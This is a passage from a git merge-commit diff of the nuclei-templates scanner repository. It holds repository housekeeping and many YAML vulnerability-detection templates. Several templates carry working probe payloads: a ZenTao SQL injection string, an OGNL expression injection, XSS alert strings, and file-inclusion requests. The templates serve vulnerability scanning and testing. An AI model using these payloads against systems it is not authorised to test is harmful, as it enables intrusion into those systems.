daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #1 from projectdiscovery/master 

tess
patch-1
Arman 2022-09-14 13:18:14 -04:00 committed by GitHub
parent 3d6f1c0aea 19de5ca8df
commit 1751ec7134
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
2773 changed files with 40598 additions and 9674 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

17
.github/ISSUE_TEMPLATE/new-template.md vendored Normal file
View File

@ -0,0 +1,17 @@
---
name: Template Request
about: 'request for new template to be created.'
labels: 'new-template'
---
<!-- ISSUES MISSING IMPORTANT INFORMATION MAY BE CLOSED WITHOUT INVESTIGATION. -->
### Template for?
<!-- Name the CVE / Vulnerability / Exploit / Misconfiguration / Technology -->
### Details:
<!-- Required information to create a nuclei template such as exploit link / source / reference / vulnerable setup / search query / demo host -->

18
.github/workflows/cache-purge.yml vendored Normal file
View File

@ -0,0 +1,18 @@
name: 🗑️ Cache Purge
on:
push:
tags:
- '*'
workflow_dispatch:
jobs:
deploy:
runs-on: ubuntu-latest
steps:
- name: Purge cache
uses: jakejarvis/cloudflare-purge-action@master
env:
CLOUDFLARE_ZONE: ${{ secrets.CLOUDFLARE_ZONE }}
CLOUDFLARE_TOKEN: ${{ secrets.CLOUDFLARE_TOKEN }}
# PURGE_URLS: '["https://version-check.nuclei.sh/versions"]'

2
.github/workflows/cve-annotate.yml vendored
View File

@ -29,7 +29,7 @@ jobs:
- name: Generate CVE Annotations
id: cve-annotate
run: |
cve-annotate -i ./cves/ -d .
cve-annotate -i . -d .
echo "::set-output name=changes::$(git status -s | wc -l)"
- name: Commit files

2
.github/workflows/template-validate.yml vendored
View File

@ -25,5 +25,5 @@ jobs:
- name: Template Validation
run: |
cp -r ${{ github.workspace }} $HOME
nuclei -validate -t .
nuclei -validate
nuclei -validate -w ./workflows

44
.new-additions
View File

@ -1,9 +1,35 @@
cnvd/2020/CNVD-2020-46552.yaml
cves/2021/CVE-2021-20123.yaml
cves/2021/CVE-2021-20124.yaml
cves/2021/CVE-2021-25075.yaml
cves/2022/CVE-2022-30489.yaml
misconfiguration/unauth-wavink-panel.yaml
technologies/kubernetes-operational-view-detect.yaml
vulnerabilities/wordpress/seo-redirection-xss.yaml
workflows/yonyou-nc-workflow.yaml
cnvd/2022/CNVD-2022-42853.yaml
cves/2014/CVE-2014-8676.yaml
cves/2015/CVE-2015-7245.yaml
cves/2018/CVE-2018-16139.yaml
cves/2020/CVE-2020-13258.yaml
cves/2021/CVE-2021-35380.yaml
cves/2021/CVE-2021-42663.yaml
cves/2021/CVE-2021-42667.yaml
cves/2022/CVE-2022-2376.yaml
cves/2022/CVE-2022-23854.yaml
cves/2022/CVE-2022-29004.yaml
cves/2022/CVE-2022-29005.yaml
cves/2022/CVE-2022-31474.yaml
cves/2022/CVE-2022-35405.yaml
cves/2022/CVE-2022-36642.yaml
cves/2022/CVE-2022-37299.yaml
cves/2022/CVE-2022-38794.yaml
default-logins/3com/3com-nj2000-default-login.yaml
exposed-panels/appsmith-web-login.yaml
exposed-panels/ccm-detect.yaml
exposed-panels/corebos-panel.yaml
exposed-panels/cvent-panel-detect.yaml
exposed-panels/omniampx-panel.yaml
exposed-panels/v2924-admin-panel.yaml
exposures/logs/redis-exception-error.yaml
exposures/logs/webalizer-xtended-stats.yaml
misconfiguration/aws-xray-application.yaml
misconfiguration/corebos-htaccess.yaml
misconfiguration/ec2-instance-information.yaml
misconfiguration/graphql/graphql-playground.yaml
misconfiguration/hivequeue-agent.yaml
misconfiguration/server-status.yaml
technologies/jhipster-detect.yaml
technologies/openssl-detect.yaml
vulnerabilities/videoxpert-lfi.yaml

5
.nuclei-ignore
View File

@ -3,6 +3,11 @@
#
# This is default list of tags and files to excluded from default nuclei scan.
# More details - https://nuclei.projectdiscovery.io/nuclei/get-started/#template-exclusion
#
# ============ DO NOT EDIT ============
# Automatically updated by nuclei on execution from nuclei-templates
# User changes should be in nuclei config file
# ============ DO NOT EDIT ============
# tags is a list of tags to ignore execution for
# unless asked for by the user.

22
README.md
View File

@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 1156 | daffainfo | 560 | cves | 1160 | info | 1192 | http | 3187 |
| panel | 515 | dhiyaneshdk | 421 | exposed-panels | 523 | high | 874 | file | 68 |
| lfi | 461 | pikpikcu | 316 | vulnerabilities | 452 | medium | 662 | network | 50 |
| xss | 367 | pdteam | 262 | technologies | 255 | critical | 414 | dns | 17 |
| wordpress | 364 | geeknik | 179 | exposures | 204 | low | 183 | | |
| exposure | 293 | dwisiswant0 | 168 | misconfiguration | 197 | unknown | 6 | | |
| rce | 291 | princechaddha | 133 | workflows | 186 | | | | |
| cve2021 | 283 | 0x_akoko | 130 | token-spray | 154 | | | | |
| tech | 271 | gy741 | 118 | default-logins | 95 | | | | |
| wp-plugin | 264 | pussycat0x | 116 | file | 68 | | | | |
| cve | 1430 | daffainfo | 631 | cves | 1407 | info | 1474 | http | 3858 |
| panel | 655 | dhiyaneshdk | 584 | exposed-panels | 662 | high | 1009 | file | 76 |
| edb | 563 | pikpikcu | 329 | vulnerabilities | 509 | medium | 818 | network | 51 |
| lfi | 509 | pdteam | 269 | technologies | 282 | critical | 478 | dns | 17 |
| xss | 491 | geeknik | 187 | exposures | 275 | low | 225 | | |
| wordpress | 419 | dwisiswant0 | 169 | misconfiguration | 237 | unknown | 11 | | |
| exposure | 407 | 0x_akoko | 165 | token-spray | 230 | | | | |
| cve2021 | 352 | princechaddha | 151 | workflows | 189 | | | | |
| rce | 337 | ritikchaddha | 137 | default-logins | 103 | | | | |
| wp-plugin | 316 | pussycat0x | 133 | file | 76 | | | | |
**261 directories, 3543 files**.
**296 directories, 4231 files**.
</td>
</tr>

96
README_KR.md Normal file
View File

@ -0,0 +1,96 @@
<h1 align="center">
Nuclei 템플릿
</h1>
<h4 align="center">커뮤니티에서 엄선한, 애플리케이션 보안 취약점을 찾기 위한 Nuclei 엔진용 템플릿 목록</h4>
<p align="center">
<a href="https://github.com/projectdiscovery/nuclei-templates/issues"><img src="https://img.shields.io/badge/contributions-welcome-brightgreen.svg?style=flat"></a>
<a href="https://github.com/projectdiscovery/nuclei-templates/releases"><img src="https://img.shields.io/github/release/projectdiscovery/nuclei-templates"></a>
<a href="https://twitter.com/pdnuclei"><img src="https://img.shields.io/twitter/follow/pdnuclei.svg?logo=twitter"></a>
<a href="https://discord.gg/projectdiscovery"><img src="https://img.shields.io/discord/695645237418131507.svg?logo=discord"></a>
</p>
<p align="center">
<a href="https://nuclei.projectdiscovery.io/templating-guide/">가이드 문서</a>
<a href="#-contributions">기여</a>
<a href="#-discussion">논의</a>
<a href="#-community">커뮤니티</a>
<a href="https://nuclei.projectdiscovery.io/faq/templates/">FAQs</a>
<a href="https://discord.gg/projectdiscovery">디스코드</a>
</p>
<p align="center">
<a href="https://github.com/projectdiscovery/nuclei-templates/blob/master/README.md">English</a>
<a href="https://github.com/projectdiscovery/nuclei-templates/blob/master/README_KR.md">한국어</a>
</p>
----
템플릿은 실제 스캐닝 엔진을 동작하게 하는 [nuclei scanner](https://github.com/projectdiscovery/nuclei)의 핵심입니다.
이 저장소는 우리 팀에서 제공하거나, 커뮤니티에서 기여한 다양한 템플릿들을 저장하고 보관합니다.
템플릿 목록을 증가시키기 위해서 **pull requests** 나 [Github issues](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+) 를 통해 기여해주시기를 부탁드립니다.
## Nuclei 템플릿 개요
고유 태그, 작성자, 디렉토리, 심각도, 템플릿 종류에 대한 통계를 포함하고 있는 nuclei 템플릿의 개요입니다. 아래 표는 각 지표의 상위 10개 항목을 나타내고 있습니다. 더 자세한 정보는 [이곳](TEMPLATES-STATS.md)에서 확인 가능하고, [JSON](TEMPLATES-STATS.json) 형식으로도 확인 가능합니다.
<table>
<tr>
<td>
## Nuclei 템플릿 통계 Top 10
| 태그 | 개수 | 작성자 | 개수 | 디렉토리 | 개수 | 심각도 | 개수 | 종류 | 개수 |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 1325 | daffainfo | 629 | cves | 1306 | info | 1398 | http | 3644 |
| panel | 604 | dhiyaneshdk | 509 | exposed-panels | 613 | high | 955 | file | 76 |
| lfi | 490 | pikpikcu | 322 | vulnerabilities | 506 | medium | 784 | network | 50 |
| xss | 451 | pdteam | 269 | technologies | 273 | critical | 445 | dns | 17 |
| wordpress | 409 | geeknik | 187 | exposures | 254 | low | 211 | | |
| exposure | 360 | dwisiswant0 | 169 | token-spray | 230 | unknown | 7 | | |
| cve2021 | 324 | 0x_akoko | 157 | misconfiguration | 210 | | | | |
| rce | 319 | princechaddha | 149 | workflows | 187 | | | | |
| wp-plugin | 304 | pussycat0x | 130 | default-logins | 102 | | | | |
| tech | 286 | gy741 | 126 | file | 76 | | | | |
**286개 디렉토리, 4012개 파일**.
</td>
</tr>
</table>
📖 문서
-----
새 템플릿이나 사용자 정의 템플릿을 빌드하기 위한 자세한 문서는 https://nuclei.projectdiscovery.io 에서 확인할 수 있습니다. 작업 방식의 이해를 돕기 위한 템플릿들도 있습니다.
💪 기여
-----
Nuclei 템플릿은 커뮤니티의 기여로 동작합니다.
[템플릿 기여](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+), [기능 요청](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=feature_request.md&title=%5BFeature%5D+), [버그 제보](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=bug_report.md&title=%5BBug%5D+)는 언제든지 환영합니다.
![Alt](https://repobeats.axiom.co/api/embed/55ee65543bb9a0f9c797626c4e66d472a517d17c.svg "Repobeats analytics image")
💬 논의
-----
같이 이야기하고 싶은 질문, 의문 혹은 아이디어가 있으신가요?
[Github discussions](https://github.com/projectdiscovery/nuclei-templates/discussions) 에서 자유롭게 시작할 수 있습니다.
👨‍💻 커뮤니티
-----
프로젝트 관리자와 직접 논의하고 보안과 자동화 관련 사항을 다른 사람과 공유하기 위해 [Discord Community](https://discord.gg/projectdiscovery) 에 참여하는 것을 환영합니다. 추가로 Nuclei 에 대한 모든 정보를 업데이트 하기 위해 [트위터](https://twitter.com/pdnuclei) 팔로우를 할 수 있습니다.
<p align="center">
<a href="https://github.com/projectdiscovery/nuclei-templates/graphs/contributors">
<img src="https://contrib.rocks/image?repo=projectdiscovery/nuclei-templates&max=300">
</a>
</p>
여러분의 기여와 커뮤니티의 활성화를 위한 노력에 다시한번 감사드립니다.
:heart:

2
TEMPLATES-STATS.json
View File

File diff suppressed because one or more lines are too long

3507
TEMPLATES-STATS.md
View File

File diff suppressed because it is too large Load Diff

20
TOP-10.md
View File

@ -1,12 +1,12 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 1156 | daffainfo | 560 | cves | 1160 | info | 1192 | http | 3187 |
| panel | 515 | dhiyaneshdk | 421 | exposed-panels | 523 | high | 874 | file | 68 |
| lfi | 461 | pikpikcu | 316 | vulnerabilities | 452 | medium | 662 | network | 50 |
| xss | 367 | pdteam | 262 | technologies | 255 | critical | 414 | dns | 17 |
| wordpress | 364 | geeknik | 179 | exposures | 204 | low | 183 | | |
| exposure | 293 | dwisiswant0 | 168 | misconfiguration | 197 | unknown | 6 | | |
| rce | 291 | princechaddha | 133 | workflows | 186 | | | | |
| cve2021 | 283 | 0x_akoko | 130 | token-spray | 154 | | | | |
| tech | 271 | gy741 | 118 | default-logins | 95 | | | | |
| wp-plugin | 264 | pussycat0x | 116 | file | 68 | | | | |
| cve | 1430 | daffainfo | 631 | cves | 1407 | info | 1474 | http | 3858 |
| panel | 655 | dhiyaneshdk | 584 | exposed-panels | 662 | high | 1009 | file | 76 |
| edb | 563 | pikpikcu | 329 | vulnerabilities | 509 | medium | 818 | network | 51 |
| lfi | 509 | pdteam | 269 | technologies | 282 | critical | 478 | dns | 17 |
| xss | 491 | geeknik | 187 | exposures | 275 | low | 225 | | |
| wordpress | 419 | dwisiswant0 | 169 | misconfiguration | 237 | unknown | 11 | | |
| exposure | 407 | 0x_akoko | 165 | token-spray | 230 | | | | |
| cve2021 | 352 | princechaddha | 151 | workflows | 189 | | | | |
| rce | 337 | ritikchaddha | 137 | default-logins | 103 | | | | |
| wp-plugin | 316 | pussycat0x | 133 | file | 76 | | | | |

34
cnvd/2017/CNVD-2017-03561.yaml Normal file
View File

@ -0,0 +1,34 @@
id: CNVD-2017-03561
info:
name: Panwei e-mobile - Ognl Injection
author: ritikchaddha
severity: high
reference:
- https://gitee.com/cute-guy/Penetration_Testing_POC/blob/master/%E6%B3%9B%E5%BE%AEe-mobile%20ognl%E6%B3%A8%E5%85%A5.md
metadata:
verified: true
fofa-query: app="泛微-eMobile"
tags: cnvd,cnvd2017,emobile,ognl,panwei
variables:
num1: "9999"
num2: "5555"
requests:
- method: GET
path:
- "{{BaseURL}}/login.do?message={{num1}}*{{num2}}"
- "{{BaseURL}}/login/login.do?message={{num1}}*{{num2}}"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- '55544445'
- type: status
status:
- 200

9
cnvd/2018/CNVD-2018-13393.yaml
View File

@ -1,11 +1,16 @@
id: CNVD-2018-13393
info:
name: Metinfo LFI
name: Metinfo - Local File Inclusion
author: ritikchaddha
severity: high
description: Metinfo is susceptible to local file inclusion.
reference:
- https://paper.seebug.org/676/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cwe-id: CWE-22
tags: metinfo,cnvd,cvnd2018,lfi
requests:
@ -23,3 +28,5 @@ requests:
- "<?php"
- "login_met_cookie($metinfo_admin_name);"
condition: and
# Enhanced by mp on 2022/07/05

12
cnvd/2020/CNVD-2020-23735.yaml
View File

@ -1,12 +1,16 @@
id: CNVD-2020-23735
info:
name: Xxunchi Local File read
name: Xxunchi CMS - Local File Inclusion
author: princechaddha
severity: medium
description: Xunyou cms has an arbitrary file reading vulnerability. Attackers can use vulnerabilities to obtain sensitive information.
severity: high
description: Xunyou CMS is vulnerable to local file inclusion. Attackers can use vulnerabilities to obtain sensitive information.
reference:
- https://www.cnvd.org.cn/flaw/show/2025171
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
tags: xunchi,lfi,cnvd,cnvd2020
requests:
@ -26,3 +30,5 @@ requests:
- "NzbwpQSdbY06Dngnoteo2wdgiekm7j4N"
- "display_errors"
condition: and
# Enhanced by mp on 2022/07/22

11
cnvd/2020/CNVD-2020-46552.yaml
View File

@ -1,13 +1,18 @@
id: CNVD-2020-46552
info:
name: Sangfor EDR Tool - Remote Code Execution
name: Sangfor EDR - Remote Code Execution
author: ritikchaddha
severity: critical
description: There is a RCE vulnerability in Sangfor Endpoint Monitoring and Response Platform (EDR). An attacker could exploit this vulnerability by constructing an HTTP request, and an attacker who successfully exploited this vulnerability could execute arbitrary commands on the target host.
description: Sangfor Endpoint Monitoring and Response Platform (EDR) contains a remote code execution vulnerability. An attacker could exploit this vulnerability by constructing an HTTP request which could execute arbitrary commands on the target host.
reference:
- https://www.modb.pro/db/144475
- https://blog.csdn.net/bigblue00/article/details/108434009
- https://cn-sec.com/archives/721509.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cwe-id: CWE-77
tags: cnvd,cnvd2020,sangfor,rce
requests:
@ -23,3 +28,5 @@ requests:
- 'contains(body, "Log Helper")'
- 'status_code == 200'
condition: and
# Enhanced by mp on 2022/05/18

5
cnvd/2020/CNVD-2020-62422.yaml
View File

@ -1,9 +1,10 @@
id: CNVD-2020-62422
info:
name: Seeyon - Arbitrary File Retrieval
name: Seeyon - Local File Inclusion
author: pikpikcu
severity: medium
description: Seeyon is vulnerable to local file inclusion.
reference:
- https://blog.csdn.net/m0_46257936/article/details/113150699
tags: lfi,cnvd,cnvd2020,seeyon
@ -30,3 +31,5 @@ requests:
words:
- "ctpDataSource.password"
condition: and
# Enhanced by mp on 2022/07/22

15
cnvd/2020/CNVD-2020-67113.yaml
View File

@ -1,15 +1,20 @@
id: CNVD-2020-67113
info:
name: H5S CONSOLE Unauthorized Access Vulnerability (CNVD-2020-67113)
name: H5S CONSOLE - Unauthorized Access
author: ritikchaddha
severity: high
description: Zero Vision Technology (Shanghai) Co., Ltd. H5S CONSOLE Exists Unauthorized Access Vulnerability
severity: medium
description: H5S CONSOLE is susceptible to an unauthorized access vulnerability.
reference:
- https://vul.wangan.com/a/CNVD-2020-67113
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cwe-id: CWE-425
metadata:
verified: true
shodan-query: http.title:"H5S CONSOLE"
tags: h5s,unauth,h5sconsole,cnvd,cnvd2020
tags: cnvd,cnvd2020,h5s,unauth,h5sconsole
requests:
- method: GET
@ -42,3 +47,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/07/06

9
cnvd/2021/CNVD-2021-01931.yaml
View File

@ -1,12 +1,17 @@
id: CNVD-2021-01931
info:
name: Ruoyi Management System - Arbitrary File Retrieval
name: Ruoyi Management System - Local File Inclusion
author: daffainfo,ritikchaddha
severity: high
description: The Ruoyi Management System contains a local file inclusion vulnerability that allows attackers to retrieve arbitrary files from the operating system.
reference:
- https://disk.scan.cm/All_wiki/%E4%BD%A9%E5%A5%87PeiQi-WIKI-POC-2021-7-20%E6%BC%8F%E6%B4%9E%E5%BA%93/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E8%8B%A5%E4%BE%9D%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F/%E8%8B%A5%E4%BE%9D%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20%E5%90%8E%E5%8F%B0%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%20CNVD-2021-01931.md?hash=zE0KEPGJ
tags: ruoyi,lfi,cnvd,cnvd2021
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cwe-id: CWE-22
requests:
- method: GET
@ -28,3 +33,5 @@ requests:
- "fonts"
- "extensions"
condition: and
# Enhanced by cs on 06/03/2022

9
cnvd/2021/CNVD-2021-10543.yaml
View File

@ -1,11 +1,16 @@
id: CNVD-2021-10543
info:
name: EEA Information Disclosure
name: EEA - Information Disclosure
author: pikpikcu
severity: high
description: EEA is susceptible to information disclosure.
reference:
- https://www.cnvd.org.cn/flaw/show/CNVD-2021-10543
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cwe-id: CWE-200
tags: config,exposure,cnvd,cnvd2021
requests:
@ -24,3 +29,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/07/05

9
cnvd/2021/CNVD-2021-28277.yaml
View File

@ -1,14 +1,19 @@
id: CNVD-2021-28277
info:
name: Landray-OA Arbitrary - Arbitrary File Retrieval
name: Landray-OA - Local File Inclusion
author: pikpikcu,daffainfo
severity: high
description: Landray-OA is susceptible to local file inclusion.
reference:
- https://www.aisoutu.com/a/1432457
- https://mp.weixin.qq.com/s/TkUZXKgfEOVqoHKBr3kNdw
metadata:
fofa-query: app="Landray OA system"
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cwe-id: CWE-22
tags: landray,lfi,cnvd,cnvd2021
requests:
@ -42,3 +47,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/07/06

14
cnvd/2021/CNVD-2021-30167.yaml
View File

@ -1,13 +1,19 @@
id: CNVD-2021-30167
info:
name: UFIDA NC BeanShell Remote Code Execution
name: UFIDA NC BeanShell Remote Command Execution
author: pikpikcu
severity: high
severity: critical
description: UFIDA NC BeanShell contains a remote command execution vulnerability in the bsh.servlet.BshServlet program.
reference:
- https://mp.weixin.qq.com/s/FvqC1I_G14AEQNztU0zn8A
- https://www.cnvd.org.cn/webinfo/show/6491
tags: beanshell,rce,cnvd,cnvd2021,yonyou
- https://chowdera.com/2022/03/202203110138271510.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cwe-id: CWE-77
tags: cnvd,cnvd2021,beanshell,rce,yonyou
requests:
- raw:
@ -40,3 +46,5 @@ requests:
- type: status
status:
- 200
# Enhanced by cs on 2022/07/05

2
cnvd/2021/CNVD-2021-49104.yaml
View File

@ -13,7 +13,7 @@ info:
cvss-score: 9.9
cwe-id: CWE-434
remediation: Pan Wei has released an update to resolve this vulnerability.
tags: pan,micro,cnvd,cnvd2021
tags: pan,micro,cnvd,cnvd2021,fileupload,intrusive
requests:
- raw:

35
cnvd/2022/CNVD-2022-42853.yaml Normal file
View File

@ -0,0 +1,35 @@
id: CNVD-2022-42853
info:
name: ZenTao CMS - SQL Injection
author: ling
severity: high
description: |
Zen Tao has a SQL injection vulnerability. Attackers can exploit the vulnerability to obtain sensitive database information.
reference:
- https://github.com/z92g/ZentaoSqli/blob/master/CNVD-2022-42853.go
- https://www.cnvd.org.cn/flaw/show/CNVD-2022-42853
metadata:
verified: true
shodan-query: http.title:"zentao"
fofa-query: "Zentao"
tags: cnvd,cnvd2022,zentao,sqli
variables:
num: "999999999"
requests:
- raw:
- |
POST /zentao/user-login.html HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Referer: {{BaseURL}}/zentao/user-login.html
account=admin'+and++updatexml(1,concat(0x1,md5({{num}})),1)+and+'1'='1
matchers:
- type: word
part: body
words:
- 'c8c605999f3d8352d7bb792cf3fdb25'

22
contributors.json
View File

@ -9,6 +9,26 @@
"email": ""
}
},
{
"author": "0x08",
"links": {
"github": "https://github.com/its0x08",
"twitter": "",
"linkedin": "",
"website": "",
"email": ""
}
},
{
"author": "Dhiyaneshwaran",
"links": {
"github": "https://github.com/DhiyaneshGeek",
"twitter": "https://twitter.com/DhiyaneshDK",
"linkedin": "https://www.linkedin.com/in/dhiyaneshwaran-b-27947a131/",
"website": "https://dhiyaneshgeek.github.io/",
"email": ""
}
},
{
"author": "duty_1g",
"links": {
@ -1349,4 +1369,4 @@
"email": ""
}
}
]
]

2
cves/2000/CVE-2000-0114.yaml
View File

@ -11,7 +11,7 @@ info:
classification:
cve-id: CVE-2000-0114
remediation: Upgrade to the latest version.
tags: cve,cve2000,frontpage,microsoft
tags: cve,cve2000,frontpage,microsoft,edb
requests:
- method: GET

14
cves/2002/CVE-2002-1131.yaml
View File

@ -1,15 +1,21 @@
id: CVE-2002-1131
info:
name: SquirrelMail 1.2.6/1.2.7 - Multiple Cross-Site Scripting Vulnerabilities
name: SquirrelMail 1.2.6/1.2.7 - Cross-Site Scripting
author: dhiyaneshDk
severity: medium
description: The Virtual Keyboard plugin for SquirrelMail is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
description: The Virtual Keyboard plugin for SquirrelMail 1.2.6/1.2.7 is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
reference:
- http://www.redhat.com/support/errata/RHSA-2002-204.html
- http://www.debian.org/security/2002/dsa-191
- http://sourceforge.net/project/shownotes.php?group_id=311&release_id=110774
- https://www.exploit-db.com/exploits/21811
- https://web.archive.org/web/20051124131714/http://archives.neohapsis.com/archives/bugtraq/2002-09/0246.html
- http://web.archive.org/web/20210129020617/https://www.securityfocus.com/bid/5763/
- https://nvd.nist.gov/vuln/detail/CVE-2002-1131
classification:
cve-id: CVE-2002-1131
tags: xss,squirrelmail,cve,cve2002
tags: cve2002,edb,xss,squirrelmail,cve
requests:
- method: GET
@ -36,3 +42,5 @@ requests:
part: header
words:
- "text/html"
# Enhanced by mp on 2022/08/12

6
cves/2004/CVE-2004-0519.yaml
View File

@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/24068
- ftp://patches.sgi.com/support/free/security/advisories/20040604-01-U.asc
- http://security.gentoo.org/glsa/glsa-200405-16.xml
- http://web.archive.org/web/20210209233941/https://www.securityfocus.com/archive/1/361857
remediation: Upgrade to the latest version.
classification:
cve-id: CVE-2004-0519
remediation: Upgrade to the latest version.
tags: xss,squirrelmail,cve2004,cve
tags: squirrelmail,cve2004,cve,edb,xss
requests:
- method: GET

6
cves/2005/CVE-2005-2428.yaml
View File

@ -4,18 +4,18 @@ info:
name: Lotus Domino R5 and R6 WebMail - Information Disclosure
author: CasperGN
severity: medium
description: "Lotus Domino R5 and R6 WebMail with 'Generate HTML for all fields' enabled (which is by default) allows remote attackers to read the HTML source to obtain sensitive information including the password hash in the HTTPPassword field, the password change date in the HTTPPasswordChangeDate field, and the client Lotus Domino release in the ClntBld field (a different vulnerability than CVE-2005-2696)."
description: Lotus Domino R5 and R6 WebMail with 'Generate HTML for all fields' enabled (which is by default) allows remote attackers to read the HTML source to obtain sensitive information including the password hash in the HTTPPassword field, the password change date in the HTTPPasswordChangeDate field, and the client Lotus Domino release in the ClntBld field (a different vulnerability than CVE-2005-2696).
reference:
- http://www.cybsec.com/vuln/default_configuration_information_disclosure_lotus_domino.pdf
- https://www.exploit-db.com/exploits/39495
- https://nvd.nist.gov/vuln/detail/CVE-2005-2428
remediation: Ensure proper firewalls are in place within your environment to prevent public exposure of the names.nsf database and other sensitive files.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2005-2428
cwe-id: CWE-200
remediation: Ensure proper firewalls are in place within your environment to prevent public exposure of the names.nsf database and other sensitive files.
tags: cve,cve2005,domino
tags: domino,edb,cve,cve2005
requests:
- method: GET

6
cves/2005/CVE-2005-3344.yaml
View File

@ -8,15 +8,18 @@ info:
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2005-3344
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3344
- http://www.debian.org/security/2005/dsa-884
- http://web.archive.org/web/20210206055804/https://www.securityfocus.com/bid/15337
classification:
cve-id: CVE-2005-3344
tags: horde,unauth
tags: cve,cve2005,horde,unauth
requests:
- method: GET
path:
- "{{BaseURL}}/horde/admin/user.php"
- "{{BaseURL}}/admin/user.php"
headers:
Content-Type: text/html
@ -26,7 +29,6 @@ requests:
- type: word
words:
- "<title>Horde :: User Administration</title>"
condition: and
- type: status
status:

7
cves/2005/CVE-2005-4385.yaml
View File

@ -1,12 +1,13 @@
id: CVE-2005-4385
info:
name: Cofax <= 2.0RC3 XSS
name: Cofax <=2.0RC3 - Cross-Site Scripting
author: geeknik
severity: medium
description: Cross-site scripting vulnerability in search.htm in Cofax 2.0 RC3 and earlier allows remote attackers to inject arbitrary web script or HTML via the searchstring parameter.
description: Cofax 2.0 RC3 and earlier contains a cross-site scripting vulnerability in search.htm which allows remote attackers to inject arbitrary web script or HTML via the searchstring parameter.
reference:
- http://pridels0.blogspot.com/2005/12/cofax-xss-vuln.html
- http://web.archive.org/web/20210121165100/https://www.securityfocus.com/bid/15940/
- https://nvd.nist.gov/vuln/detail/CVE-2005-4385
classification:
cve-id: CVE-2005-4385
@ -26,3 +27,5 @@ requests:
part: body
words:
- "'>\"</script><script>alert(document.domain)</script>"
# Enhanced by mp on 2022/08/12

10
cves/2006/CVE-2006-1681.yaml
View File

@ -1,12 +1,14 @@
id: CVE-2006-1681
info:
name: Cherokee HTTPD <=0.5 XSS
name: Cherokee HTTPD <=0.5 - Cross-Site Scripting
author: geeknik
severity: medium
description: Cross-site scripting (XSS) vulnerability in Cherokee HTTPD 0.5 and earlier allows remote attackers to inject arbitrary web script or HTML via a malformed request that generates an HTTP 400 error, which is not properly handled when the error message is generated.
description: Cherokee HTTPD 0.5 and earlier contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via a malformed request that generates an HTTP 400 error, which is not properly handled when the error message is generated.
reference:
- https://www.securityfocus.com/bid/17408
- http://web.archive.org/web/20210217161726/https://www.securityfocus.com/bid/17408/
- http://web.archive.org/web/20140803090438/http://secunia.com/advisories/19587/
- http://www.vupen.com/english/advisories/2006/1292
- https://nvd.nist.gov/vuln/detail/CVE-2006-1681
classification:
cve-id: CVE-2006-1681
@ -30,3 +32,5 @@ requests:
part: header
words:
- text/html
# Enhanced by mp on 2022/08/12

18
cves/2006/CVE-2006-2842.yaml
View File

@ -1,18 +1,22 @@
id: CVE-2006-2842
info:
name: Squirrelmail 1.4.x - 'Redirect.php' Local File Inclusion
name: Squirrelmail <=1.4.6 - Local File Inclusion
author: dhiyaneshDk
severity: high
description: 'PHP remote file inclusion vulnerability in functions/plugin.php in SquirrelMail 1.4.6 and earlier, if register_globals is enabled and magic_quotes_gpc is disabled, allows remote attackers to execute
arbitrary PHP code via a URL in the plugins array parameter. NOTE: this issue has been disputed by third parties, who state that Squirrelmail provides prominent warnings to the administrator when register_globals
